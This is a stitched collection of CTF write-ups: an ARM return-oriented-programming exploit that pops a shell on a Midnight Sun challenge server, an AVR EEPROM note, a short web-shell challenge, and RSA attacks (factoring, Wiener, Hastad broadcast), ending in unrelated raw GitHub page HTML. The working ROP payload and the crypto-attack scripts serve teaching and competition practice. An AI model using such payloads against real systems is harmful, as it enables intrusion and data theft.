So now lets just prep the registers. I use ROPgadget to find good gadgets.``` $ ROPgadget --binary ./pwn3 --only popGadgets information============================================================0x0001ddc0 : pop {r0, ip, sp, pc}0x00015524 : pop {r0, r1, ip, sp, pc}0x00013c9c : pop {r0, r1, r2, ip, sp, pc}0x00013080 : pop {r0, r1, r2, r3, ip, sp, pc}0x000169c4 : pop {r0, r1, r2, r3, r5, ip, sp, pc}0x00028d90 : pop {r0, r1, r2, r4, ip, sp, pc}0x00024460 : pop {r0, r1, r2, r6, r7, sb, sl, fp, ip, sp, lr, pc}0x00014470 : pop {r0, r1, r3, ip, sp, pc}0x000288f0 : pop {r0, r1, r4, ip, sp, pc}0x00036558 : pop {r0, r1, r5, ip, sp, pc}0x00014ee4 : pop {r0, r2, ip, sp, pc}0x000158b4 : pop {r0, r2, r3, ip, sp, pc}0x00023b08 : pop {r0, r2, r3, r4, ip, sp, pc}0x000394f8 : pop {r0, r2, r3, r7, sb, fp, ip, sp, lr, pc}0x00021edc : pop {r0, r2, r4, r5, ip, sp, pc}0x0002aa94 : pop {r0, r2, r5, ip, sp, pc}0x00014c34 : pop {r0, r3, ip, sp, pc}0x0001c59c : pop {r0, r3, r4, ip, sp, pc}0x00011b20 : pop {r0, r3, r4, r5, ip, sp, pc}0x000108fc : pop {r0, r3, r4, r5, r6, r7, r8, ip, lr, pc}0x00043858 : pop {r0, r3, r5, ip, sp, pc}0x0002c3a4 : pop {r0, r3, r6, ip, sp, pc}0x0001e6d8 : pop {r0, r4, ip, sp, pc}0x0001fb5c : pop {r0, r4, pc}...
$ ROPgadget --binary ./pwn3 --string /bin/shStrings information============================================================0x00049018 : /bin/sh```And to find the function I just search for references to /bin/sh in ghidra. Or in this case go to the function that takes "cat banner.txt" as argument. (0x14b5c).
```python...array = cyclic(cyclic_find(b'jaab')) + "0123" + p32(0x0001fb5c) + p32(0x00049018) + "1111" + p32(0x14b5d) io.sendline(array)io.interactive()```A good thing to notice is that I'm using 0x14b5d instead of 0x14b5c. This is due to ARM instruction alignment. So if you get wierd instructions jumping somewhere, just test shifting the address a little up or down.
Running this against the remote server we get a shell and can simply print the flag.```$ ./exploit [*] '/home/henrik/midnight2020/pwn3/pwn3' Arch: arm-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x10000)[+] Opening connection to pwn3-01.play.midnightsunctf.se on port 10003: Done[*] Switching to interactive mode ▄▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▄ ▄▄▄▄▄▄▄▄▄█ ▀ ▀███ ▄█████████▄ ▄███ ▄███ ▄███ ▄███ ▄█████████▄ ██████████ ▄ ▄ ▄ █ ████▀▀▀████ ████ ████ █████▄ ████ ▀▀▀▀▀▀▀████ ██████████ ▄ ▄▀▀▄ █▄▀▀▄ ████▄▄▄████ ████ ▄ ████ ███████████ ▄▄▄███▀ ▀▀▀▄▀▀▄▀▀█ ▄ █ ▀▄▄▄▄▀ █ ██████████▀ ████▄███▄████ ████▀▀█████ ▀▀▀███▄ ███▀▄ ▀▀█ █ █ ████▀▀▀▀▀▀ ██████▀██████ ████ ▀████ ▄▄▄▄▄▄▄████ █████▀▀▄▄█ ▄ ▄█ ▄█ ▄ ▄█ █ ████ ████▀▀ ▀▀████ ████ ████ ██████████▀ ▀▀▀▀▀▀▀▀▀█ ▄ █ ██ ▄ ▄ ▄ ███ ▀▀▀▀ ▀▀▀▀ ▀▀▀▀ ▀▀▀▀ ▀▀▀▀ ▀▀▀▀▀▀▀▀▀▀ ████████▄█ ▄ ▀▄ ▀▀▀▀▀▀▀ ▄▀ ▄▀ ▀█▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▀▀█▀▀▀█▀▀▀ █▄▄▀ █▄▄▀ █▄▄▀ ▀▄▄█buffer: $ lsbanner.txtflagpwn3redir.sh$ cat flagmidnight{the_pwn_knight_16435f41118a38dd}``` |
TLDR: You need to read more than 32 bytes of EEPROM which seems tricky becuase strings are length limited. However, the comparison function doesn't look at the size field of the string and data is not cleared between runs so we can get a string that overlaps old data in SRAM in order to have a much longer string. The exploit is then the same idea as the rev version
[Full writuep](https://ctf.harrisongreen.me/2020/midnightsunctf/avr/) |
# 10 Character Web Shell
The main page displayed the code of index page.```php
```If we pass any value of `c`, it will execute it. But its length must me **less than 10.**So I tried `echo hey` and it worked. Then I tried the command `ls` to list directory. There were about 300 files with random looking names. I scrolled to bottom and saw `flag.txt`.

Then I tried `cat flag.txt` but as length of the string is 12, It didn't execute it. I remembered one article where some unicode characters were used to bypass this length limit, but here there was no case transformation so I thought it wouldn't work.
Then after few minutes, I thought that flag is in the same directory, so instead of passing command, I can simply access it by `http://jh2i.com:50001/flag.txt`
> ### LLS{you_really_can_see_in_the_dark} |
<h1 align="center">Cryptography</h1>
<h3>Polybius 70 points</h3>
Polybius is hosting a party, and you’re invited. He gave you his number; be there or be square!Note, this flag is not in the usual flag format.
Download the file below: polybius.txt
``` shell413532551224514444425111431524443435454523114523114314```
``` shellFor this challenge, i use the site DCODE.
Flag: POLYBIUSSQUAREISNOTTHATHARD```
<h3>Classic 80 points</h3>
My friend told me this "was a classic", but these letters and numbers don't make any sense to me. I didn't know this would be a factor in our friendship!
Download the file below: classic.txt
``` pythonFor this challenge, i use python with libnum and yafu for the factorisation of n.
n = 77627938360345301510724699969247652387657633828943576274039402978346703944383
e = 65537
c = 62899945974090753231979111677615029855602721049941681356856158761811378918268
"""Factorisation with YAFUstarting SIQS on c77: 77627938360345301510724699969247652387657633828943576274039402978346703944383
==== sieving in progress (1 thread): 36224 relations needed ======== Press ctrl-c to abort and save state ====36103 rels found: 18466 full + 17637 from 187841 partial, (873.70 rels/sec)
SIQS elapsed time = 239.6736 seconds.Total factoring time = 300.7092 seconds
***factors found***
P39 = 269967471399519356371128763174813106357P39 = 287545525236502653835798598413374134819
ans = 1"""
p = 269967471399519356371128763174813106357q = 287545525236502653835798598413374134819
#!/usr/bin/env pythonimport libnum
n=p*qphi=(p-1)*(q-1)d = libnum.modular.invmod(e, phi)print libnum.n2s(pow(c, d, n))
# LLS{just_another_rsa_chal}
Flag: LLS{just_another_rsa_chal}```
<h3>Hot Dog 100 points</h3>
This isn't a problem with the grill.
Download the file below: hot_dog.txt
``` pythonFor this challenge, i use python3 and RsaCtfTool.
python3 RsaCtfTool.py -n 609983533322177402468580314139090006939877955334245068261469677806169434040069069770928535701086364941983428090933795745853896746458472620457491993499511798536747668197186857850887990812746855062415626715645223089415186093589721763366994454776521466115355580659841153428179997121984448771910872629371808169183 -e 387825392787200906676631198961098070912332865442137539919413714790310139653713077586557654409565459752133439009280843965856789151962860193830258244424149230046832475959852771134503754778007132465468717789936602755336332984790622132641288576440161244396963980583318569320681953570111708877198371377792396775817 --uncipher 387550614803874258991642724003284418859467464692188062983793173435868573346772557240137839436544557982321847802344313679589173157662615464542092163712541321351682014606383820947825480748404154232812314611063946877021201178164920650694457922409859337200682155636299936841054496931525597635432090165889554207685 --verbose[*] Performing hastads attack.[*] Performing prime_n attack.[*] Performing factordb attack.[*] Performing pastctfprimes attack.[*] Loaded 71 primes[*] Performing mersenne_primes attack.[*] Performing noveltyprimes attack.[*] Performing smallq attack.[*] Performing wiener attack.[+] Clear text : b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00LLS{looks_like_weiners_on_the_barbecue}'
Flag: LLS{looks_like_weiners_on_the_barbecue}```
<h3>Old Monitor 135 points</h3>
I have this old CRT monitor that I use for my desktop computer. It crashed on me and spit out all these weird numbers…
Download the file below: old_monitor.png
``` shellFor this challenge, i use gocr and python.```
``` python
N1 = 7156756869076785933541721538001332468058823716463367176522928415602207483494410804148006276542112924303341451770810669016327730854877940615498537882480613N2 = 11836621785229749981615163446485056779734671669107550651518896061047640407932488359788368655821120768954153926193557467079978964149306743349885823110789383N3 = 7860042756393802290666610238184735974292004010562137537294207072770895340863879606654646472733984175066809691749398560891393841950513254137326295011918329C1 = 816151508695124692025633485671582530587173533405103918082547285368266333808269829205740958345854863854731967136976590635352281190694769505260562565301138C2 = 8998140232866629819387815907247927277743959734393727442896220493056828525538465067439667506161727590154084150282859497318610746474659806170461730118307571C3 = 3488305941609131204120284497226034329328885177230154449259214328225710811259179072441462596230940261693534332200171468394304414412261146069175272094960414
e=3def chinese_remainder(n, a): sum = 0 prod = reduce(lambda a, b: a*b, n) for n_i, a_i in zip(n, a): p = prod / n_i sum += a_i * mul_inv(p, n_i) * p return sum % prod
def mul_inv(a, b): b0 = b x0, x1 = 0, 1 if b == 1: return 1 while a > 1: q = a / b a, b = b, a%b x0, x1 = x1 - q * x0, x0 if x1 < 0: x1 += b0 return x1
def find_invpow(x,n): """Finds the integer component of the n'th root of x, an integer such that y ** n <= x < (y + 1) ** n. """ high = 1 while high ** n < x: high *= 2 low = high/2 while low < high: mid = (low + high) // 2 if low < mid and mid**n < x: low = mid elif high > mid and mid**n > x: high = mid else: return mid return mid + 1
flag_cubed=chinese_remainder([N1,N2,N3],[C1,C2,C3])flag=find_invpow(flag_cubed,3)
print "flag: ",hex(flag)[2:-1].decode("hex")
# flag: LLS{the_chinese_remainder_theorem_is_so_cool}
Flag: LLS{the_chinese_remainder_theorem_is_so_cool}```
Return to the main menu
Return to the main menu
|
<html lang="en" data-color-mode="auto" data-light-theme="light" data-dark-theme="dark" data-a11y-animated-images="system"> <head> <meta charset="utf-8"> <link rel="dns-prefetch" href="https://github.githubassets.com"> <link rel="dns-prefetch" href="https://avatars.githubusercontent.com"> <link rel="dns-prefetch" href="https://github-cloud.s3.amazonaws.com"> <link rel="dns-prefetch" href="https://user-images.githubusercontent.com/"> <link rel="preconnect" href="https://github.githubassets.com" crossorigin> <link rel="preconnect" href="https://avatars.githubusercontent.com">
<link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/light-fe3f886b577a.css" /><link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/dark-a1dbeda2886c.css" /><link data-color-theme="dark_dimmed" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_dimmed-1ad5cf51dfeb.css" /><link data-color-theme="dark_high_contrast" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_high_contrast-11d3505dc06a.css" /><link data-color-theme="dark_colorblind" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_colorblind-8b800495504f.css" /><link data-color-theme="light_colorblind" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_colorblind-daa38c88b795.css" /><link data-color-theme="light_high_contrast" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_high_contrast-1b9ea565820a.css" /><link data-color-theme="light_tritanopia" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_tritanopia-e4be9332dd6c.css" /><link data-color-theme="dark_tritanopia" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_tritanopia-0dcf95848dd5.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/primer-c581c4e461bb.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/global-0e278d45156f.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/github-dcaf0f44dbb1.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/code-26709f54a08d.css" />
<script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/wp-runtime-774bfe5ae983.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_stacktrace-parser_dist_stack-trace-parser_esm_js-node_modules_github_bro-327bbf-0aaeb22dd2a5.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/ui_packages_soft-nav_soft-nav_ts-21fc7a4a0e8f.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/environment-e059fd03252f.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_selector-observer_dist_index_esm_js-2646a2c533e3.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modules_github_details-dialog-elemen-63debe-c04540d458d4.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_relative-time-element_dist_index_js-b9368a9cb79e.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_fzy_js_index_js-node_modules_github_markdown-toolbar-element_dist_index_js-e3de700a4c9d.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_auto-complete-element_dist_index_js-node_modules_github_catalyst_-6afc16-e779583c369f.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_github_text-ex-3415a8-7ecc10fb88d0.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_filter-input-element_dist_index_js-node_modules_github_remote-inp-79182d-befd2b2f5880.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_primer_view-components_app_components_primer_primer_js-node_modules_gith-6a1af4-df3bc95b06d3.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/github-elements-fc0e0b89822a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/element-registry-1641411db24a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_lit-html_lit-html_js-9d9fe1859ce5.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_manuelpuyol_turbo_dist_turbo_es2017-esm_js-4140d67f0cc2.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_github_alive-client_dist-bf5aa2-424aa982deef.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_dimensions_js-node_modules_github_hotkey_dist_-9fc4f4-d434ddaf3207.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_color-convert_index_js-35b3ae68c408.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_github_session-resume_dist-def857-2a32d97c93c5.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_paste-markdown_dist_index_esm_js-node_modules_github_quote-select-15ddcc-1512e06cfee0.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_updatable-content_ts-430cacb5f7df.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_keyboard-shortcuts-helper_ts-app_assets_modules_github_be-f5afdb-8dd5f026c5b9.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_sticky-scroll-into-view_ts-0af96d15a250.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_include-fragment_ts-app_assets_modules_github_behaviors_r-4077b4-75370d1c1705.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_commenting_edit_ts-app_assets_modules_github_behaviors_ht-83c235-7883159efa9e.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/behaviors-742151da9690.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modules_github_catalyst_lib_index_js-06ff531-32d7d1e94817.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/notifications-global-f5b58d24780b.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_morphdom_dist_morphdom-esm_js-node_modules_github_template-parts_lib_index_js-58417dae193c.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_virtualized-list_es_index_js-node_modules_github_memoize_dist_esm_index_js-8496b7c4b809.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-70450e-0370b887db62.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_ref-selector_ts-7bdefeb88a1a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/codespaces-d1ede1f1114e.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_filter-input-element_dist_index_js-node_modules_github_mini-throt-a33094-b03defd3289b.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_github_mini-th-85225b-226fc85f9b72.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/repositories-8093725f8825.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/topic-suggestions-7a1f0da7430a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/code-menu-89d93a449480.js"></script>
<title>ctf-writeups/VirSecCon CTF/binary exploitation/seed spring at master · KEERRO/ctf-writeups · GitHub</title>
<meta name="route-pattern" content="/:user_id/:repository/tree/*name(/*path)">
<meta name="current-catalog-service-hash" content="343cff545437bc2b0304c97517abf17bb80d9887520078e9757df416551ef5d6">
<meta name="request-id" content="C610:68DA:20A93491:21A59249:6412217A" data-pjax-transient="true"/><meta name="html-safe-nonce" content="1869fe6e2e5f18eded3ecf55048f57176d3d0c3dee6e336a1511b35875ed1fb1" data-pjax-transient="true"/><meta name="visitor-payload" content="eyJyZWZlcnJlciI6IiIsInJlcXVlc3RfaWQiOiJDNjEwOjY4REE6MjBBOTM0OTE6MjFBNTkyNDk6NjQxMjIxN0EiLCJ2aXNpdG9yX2lkIjoiMjAxNDQxMTg2MTkwMzE1NTU3OCIsInJlZ2lvbl9lZGdlIjoiZnJhIiwicmVnaW9uX3JlbmRlciI6ImZyYSJ9" data-pjax-transient="true"/><meta name="visitor-hmac" content="c7f426521122d9c1982740bfbd236bbd0fc44c033f388070fc841bf2b32e9756" data-pjax-transient="true"/>
<meta name="hovercard-subject-tag" content="repository:162845937" data-turbo-transient>
<meta name="github-keyboard-shortcuts" content="repository,source-code,file-tree" data-turbo-transient="true" />
<meta name="selected-link" value="repo_source" data-turbo-transient>
<meta name="google-site-verification" content="c1kuD-K2HIVF635lypcsWPoD4kilo5-jA_wBFyT4uMY"> <meta name="google-site-verification" content="KT5gs8h0wvaagLKAVWq8bbeNwnZZK1r1XQysX3xurLU"> <meta name="google-site-verification" content="ZzhVyEFwb7w3e0-uOTltm8Jsck2F5StVihD0exw2fsA"> <meta name="google-site-verification" content="GXs5KoUUkNCoaAZn7wPN-t01Pywp9M3sEjnt_3_ZWPc"> <meta name="google-site-verification" content="Apib7-x98H0j5cPqHWwSMm6dNU4GmODRoqxLiDzdx9I">
<meta name="octolytics-url" content="https://collector.github.com/github/collect" />
<meta name="analytics-location" content="/<user-name>/<repo-name>/files/disambiguate" data-turbo-transient="true" />
<meta name="user-login" content="">
<meta name="viewport" content="width=device-width"> <meta name="description" content="Contribute to KEERRO/ctf-writeups development by creating an account on GitHub."> <link rel="search" type="application/opensearchdescription+xml" href="/opensearch.xml" title="GitHub"> <link rel="fluid-icon" href="https://github.com/fluidicon.png" title="GitHub"> <meta property="fb:app_id" content="1401488693436528"> <meta name="apple-itunes-app" content="app-id=1477376905" /> <meta name="twitter:image:src" content="https://opengraph.githubassets.com/e68933ac284b7f665c8ea555e19d7e6118920c67571ea8ca1312106e9058e23e/KEERRO/ctf-writeups" /><meta name="twitter:site" content="@github" /><meta name="twitter:card" content="summary_large_image" /><meta name="twitter:title" content="ctf-writeups/VirSecCon CTF/binary exploitation/seed spring at master · KEERRO/ctf-writeups" /><meta name="twitter:description" content="Contribute to KEERRO/ctf-writeups development by creating an account on GitHub." /> <meta property="og:image" content="https://opengraph.githubassets.com/e68933ac284b7f665c8ea555e19d7e6118920c67571ea8ca1312106e9058e23e/KEERRO/ctf-writeups" /><meta property="og:image:alt" content="Contribute to KEERRO/ctf-writeups development by creating an account on GitHub." /><meta property="og:image:width" content="1200" /><meta property="og:image:height" content="600" /><meta property="og:site_name" content="GitHub" /><meta property="og:type" content="object" /><meta property="og:title" content="ctf-writeups/VirSecCon CTF/binary exploitation/seed spring at master · KEERRO/ctf-writeups" /><meta property="og:url" content="https://github.com/KEERRO/ctf-writeups" /><meta property="og:description" content="Contribute to KEERRO/ctf-writeups development by creating an account on GitHub." /> <link rel="assets" href="https://github.githubassets.com/">
<meta name="hostname" content="github.com">
<meta name="expected-hostname" content="github.com">
<meta name="enabled-features" content="TURBO_EXPERIMENT_RISKY,IMAGE_METRIC_TRACKING,GEOJSON_AZURE_MAPS">
<meta http-equiv="x-pjax-version" content="ef97471de14f8d2285f0269e8f0f7dc70845f693d3f6ccd2dd2daae5cd1bbebe" data-turbo-track="reload"> <meta http-equiv="x-pjax-csp-version" content="2a84822a832da97f1ea76cf989a357ec70c85713a2fd8f14c8421b76bbffe38c" data-turbo-track="reload"> <meta http-equiv="x-pjax-css-version" content="adfc12179419e463f9f320d07920b1684c9b7e060d4d9cd3a6cd5d0de37ce710" data-turbo-track="reload"> <meta http-equiv="x-pjax-js-version" content="711646ae23abb27cf728346f30f81c042d4428233a0795acf0e21ed664fe9d94" data-turbo-track="reload">
<meta name="turbo-cache-control" content="no-preview" data-turbo-transient="">
<meta data-hydrostats="publish">
<meta name="go-import" content="github.com/KEERRO/ctf-writeups git https://github.com/KEERRO/ctf-writeups.git">
<meta name="octolytics-dimension-user_id" content="46076094" /><meta name="octolytics-dimension-user_login" content="KEERRO" /><meta name="octolytics-dimension-repository_id" content="162845937" /><meta name="octolytics-dimension-repository_nwo" content="KEERRO/ctf-writeups" /><meta name="octolytics-dimension-repository_public" content="true" /><meta name="octolytics-dimension-repository_is_fork" content="false" /><meta name="octolytics-dimension-repository_network_root_id" content="162845937" /><meta name="octolytics-dimension-repository_network_root_nwo" content="KEERRO/ctf-writeups" />
<link rel="canonical" href="https://github.com/KEERRO/ctf-writeups/tree/master/VirSecCon%20CTF/binary%20exploitation/seed%20spring" data-turbo-transient> <meta name="turbo-body-classes" content="logged-out env-production page-responsive">
<meta name="browser-stats-url" content="https://api.github.com/_private/browser/stats">
<meta name="browser-errors-url" content="https://api.github.com/_private/browser/errors">
<meta name="browser-optimizely-client-errors-url" content="https://api.github.com/_private/browser/optimizely_client/errors">
<link rel="mask-icon" href="https://github.githubassets.com/pinned-octocat.svg" color="#000000"> <link rel="alternate icon" class="js-site-favicon" type="image/png" href="https://github.githubassets.com/favicons/favicon.png"> <link rel="icon" class="js-site-favicon" type="image/svg+xml" href="https://github.githubassets.com/favicons/favicon.svg">
<meta name="theme-color" content="#1e2327"><meta name="color-scheme" content="light dark" />
<link rel="manifest" href="/manifest.json" crossOrigin="use-credentials">
</head>
<body class="logged-out env-production page-responsive" style="word-wrap: break-word;"> <div data-turbo-body class="logged-out env-production page-responsive" style="word-wrap: break-word;">
<div class="position-relative js-header-wrapper "> Skip to content <span> <span></span></span>
<script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-94fd67-04fa93bb158a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/sessions-9920eaa99f50.js"></script><header class="Header-old header-logged-out js-details-container Details position-relative f4 py-3" role="banner"> <button type="button" class="Header-backdrop d-lg-none border-0 position-fixed top-0 left-0 width-full height-full js-details-target" aria-label="Toggle navigation"> <span>Toggle navigation</span> </button>
<div class="container-xl d-flex flex-column flex-lg-row flex-items-center p-responsive height-full position-relative z-1"> <div class="d-flex flex-justify-between flex-items-center width-full width-lg-auto"> <svg height="32" aria-hidden="true" viewBox="0 0 16 16" version="1.1" width="32" data-view-component="true" class="octicon octicon-mark-github"> <path d="M8 0c4.42 0 8 3.58 8 8a8.013 8.013 0 0 1-5.45 7.59c-.4.08-.55-.17-.55-.38 0-.27.01-1.13.01-2.2 0-.75-.25-1.23-.54-1.48 1.78-.2 3.65-.88 3.65-3.95 0-.88-.31-1.59-.82-2.15.08-.2.36-1.02-.08-2.12 0 0-.67-.22-2.2.82-.64-.18-1.32-.27-2-.27-.68 0-1.36.09-2 .27-1.53-1.03-2.2-.82-2.2-.82-.44 1.1-.16 1.92-.08 2.12-.51.56-.82 1.28-.82 2.15 0 3.06 1.86 3.75 3.64 3.95-.23.2-.44.55-.51 1.07-.46.21-1.61.55-2.33-.66-.15-.24-.6-.83-1.23-.82-.67.01-.27.38.01.53.34.19.73.9.82 1.13.16.45.68 1.31 2.69.94 0 .67.01 1.3.01 1.49 0 .21-.15.45-.55.38A7.995 7.995 0 0 1 0 8c0-4.42 3.58-8 8-8Z"></path></svg>
<div class="flex-1"> Sign up </div>
<div class="flex-1 flex-order-2 text-right"> <button aria-label="Toggle navigation" aria-expanded="false" type="button" data-view-component="true" class="js-details-target Button--link Button--medium Button d-lg-none color-fg-inherit p-1"> <span> <span><div class="HeaderMenu-toggle-bar rounded my-1"></div> <div class="HeaderMenu-toggle-bar rounded my-1"></div> <div class="HeaderMenu-toggle-bar rounded my-1"></div></span> </span></button> </div> </div>
<div class="HeaderMenu--logged-out p-responsive height-fit position-lg-relative d-lg-flex flex-column flex-auto pt-7 pb-4 top-0"> <div class="header-menu-wrapper d-flex flex-column flex-self-end flex-lg-row flex-justify-between flex-auto p-3 p-lg-0 rounded rounded-lg-0 mt-3 mt-lg-0"> <nav class="mt-0 px-3 px-lg-0 mb-3 mb-lg-0" aria-label="Global"> <button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 py-3 py-lg-2 no-wrap d-flex flex-items-center flex-justify-between js-details-target" aria-expanded="false"> Product <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down HeaderMenu-icon ml-1"> <path d="M12.78 5.22a.749.749 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.06 0L3.22 6.28a.749.749 0 1 1 1.06-1.06L8 8.939l3.72-3.719a.749.749 0 0 1 1.06 0Z"></path></svg> </button> <div class="HeaderMenu-dropdown dropdown-menu rounded m-0 p-0 py-2 py-lg-4 position-relative position-lg-absolute left-0 left-lg-n3 d-lg-flex dropdown-menu-wide">
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-workflow color-fg-subtle mr-3"> <path d="M1 3a2 2 0 0 1 2-2h6.5a2 2 0 0 1 2 2v6.5a2 2 0 0 1-2 2H7v4.063C7 16.355 7.644 17 8.438 17H12.5v-2.5a2 2 0 0 1 2-2H21a2 2 0 0 1 2 2V21a2 2 0 0 1-2 2h-6.5a2 2 0 0 1-2-2v-2.5H8.437A2.939 2.939 0 0 1 5.5 15.562V11.5H3a2 2 0 0 1-2-2Zm2-.5a.5.5 0 0 0-.5.5v6.5a.5.5 0 0 0 .5.5h6.5a.5.5 0 0 0 .5-.5V3a.5.5 0 0 0-.5-.5ZM14.5 14a.5.5 0 0 0-.5.5V21a.5.5 0 0 0 .5.5H21a.5.5 0 0 0 .5-.5v-6.5a.5.5 0 0 0-.5-.5Z"></path></svg> <div> <div class="color-fg-default h4">Actions</div> Automate any workflow </div>
